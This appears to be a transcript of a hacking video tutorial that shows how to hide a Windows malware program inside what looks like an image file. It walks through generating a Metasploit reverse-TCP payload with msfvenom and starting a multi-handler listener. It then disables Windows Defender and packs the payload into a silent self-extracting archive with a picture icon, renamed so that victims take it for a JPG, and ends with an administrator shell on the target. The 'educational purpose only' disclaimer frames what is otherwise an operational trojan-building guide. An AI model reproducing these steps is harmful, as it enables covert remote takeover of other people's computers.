In this video, I'm going to show you how you can hack the Windows machine using the image file. So first thing first, if you are new to my channel, please don't forget to subscribe, like and share my video. Remember, this video content has been created for educational purpose only. I'm using my own lab environment to demonstrate this video and I'm not responsible how you use this tool. With that, let's jump into the video. First thing, I have Windows 11 and Kali Linux. So make sure you do have two machines. With that, let's open the terminal here. Once you open the terminal, let me make it bigger. So you have to type ms venom -p. This P is for payload, and Windows Metasploit /reverse _TCP and equals to host, lhost equals to, and let's check the IP address right here. Config, and let's use this IP, paste, and after that we have to use L port equals to 8888, and you can use any port, it doesn't really matter, and F and exe, which execute file, and -o is output, home Kali Windows. So once you put the name there, you can put any name, it doesn't really matter. So I will say my puppy.exe. So because I'm using my puppy image file, reverse the Metasploit. So hit enter. Once you hit enter, it will generate my puppy.exe file inside the Windows folder, whatever you created. So ms venom, P is for payload, Windows Metasploit, reverse TCP, and this is our host, and this is our port, and execute files, output with this file. So once you generate this one, and we will double confirm if it's generated or not. So let's wait for like a few seconds here. Alright, so let's check cd home Kali and Windows. Let's see. So alright, so here is my puppy.exe. Once you generate this my puppy.exe or whatever name you generate right here, make sure you generate the puppy whatever name, so it doesn't really matter. Alright, so once you generate that file.exe, we have to go Windows machine and we need to create the image file on it. So I download that my puppy.exe from that Kali Linux, and after you generate that, you have to create the icon file and then the real, let me show you right here. So click on properties and you'll see that JPG file, and this is the icon file. So go more options right here. So you can create icon file. You can use any icon generator. So if you Google it, you can do from there icon converter. So once you open the icon converter, you can open that image file. You can use this tool. I create this icon file from here. So I will also put this link in the description below, so you will you don't have to go back and forth. After you create the icon file, you are pretty much set. What we can do here, we need to generate the listener on the Kali. Let's do that first. Let me close this and let's do msf console. I need enter. Okay, once you load MS console, you have to type, so once you load the MS console, you have to type use exploit multi-handler. Okay, and once you hit multi-handler, you have to type set payload windows, set payload windows Metasploit /reverse TCP. What you can do here, so options, and we can use lhost and lport. So lport, whatever we assign it, you have to put this one on the lport. Let's do that. Set lhost, and we have to verify our IP address. So make sure your IP address is correct and paste it here, hit enter, set lport and 8888, we use that, and close and check one more time. Okay, so we are pretty much set here. lhost is this our IP, lport is our port whatever we generated, and after that we are ready to exploit that. Once you are ready to exploit, you have to type exploit and hit enter, and we are listening right now. As soon as that image file is loaded, we will able to get Metasploit cell right here. So for that, let's go ahead and begin that. So once you run the exploit from your Kali, you have to go, you can select any image file. Mentioned you earlier, you can just change the image file into icon converter, and make sure your antivirus or whatever you do have. I do have Windows Defender, so I disable it. This one you can download, you can go ahead and you can just turn off from here. So manage settings, and you can just turn off from here, and once you turn off there, it's gone right here, if you see right here. So what I can do, I can just download again from that one. Whatever you generate right here is you have to copy and paste here, and once you generate the icon file, so this is the icon file whatever I created, and this is the image file. This is the image file, as you see right here, the JPG file, and this is the malicious file we generate from the Kali. So I am gonna go right click on it, and I will say load to archive and add to archive. Once you open that, you have to click on create SFX archive. Okay, so you can compress best, it doesn't really matter, but let's create that. Once you create FX file, you have to click on advanced and SFX options, you have to click on it and click on setup, and you have to copy this JPG file and copy this and put it here. .exe. Once you, and this is my puppy file from here, so those are the two files I select from here. And once we go here, let me see, here, so SFS icon file. So once you click on text and icon, so you will able to see it. I will open that file on desktop. So this is my icon file, and click on cancel, open it, and you have to go hide all, you have to do models, hide all, and you have to click on updates, you have to do override all files. So, and once you done this one, so what we did is right here, so general, we don't have anything set up, we do have the puppy file, and once you click on OK, you will able to see all this one. So what we did here is create SFX archive and the best compression, and once you click on advanced, you'll see the options right here, FSX options, and we set up those two files from here, and models, hide all the payload silence mode. You don't have to, because if we display it, maybe someone caught you. And if you click on advanced, there is nothing we did. And models, we haven't done anything. We upload the icon file. Once you satisfy all the settings and click on OK, and we will see the poppy.exe. So see, there's, if you right click here, you'll see the exact, what is it? So exe, right? But it's pretend that's we have the image file. Rename it, just rename it. Let's rename right here .jpg, right? So even doesn't know, no one knows. So this, okay, so this is the image file. Once you generate that file, and once you open this file, it doesn't, it's normal. There's nothing you will see, nothing you will do. You don't have capability to do it. But the user say, oh, okay, that's a little funny, okay. So but in the real time, we get the Metasploit shell right here. So we can do ipconfig. So this is the ipconfig for this file. So if you see right here, so that's how we will able to generate the Metasploit. But 129 IP, you will see right here 120. So you can also do shell. So do who am I? So I am the administrator. So this is how we will do it. So this is so easy. So, and again, please remember that this video content has been created for educational purpose only. I'm using my own lab environment to demonstrate, and I'm not responsible how you use this tool.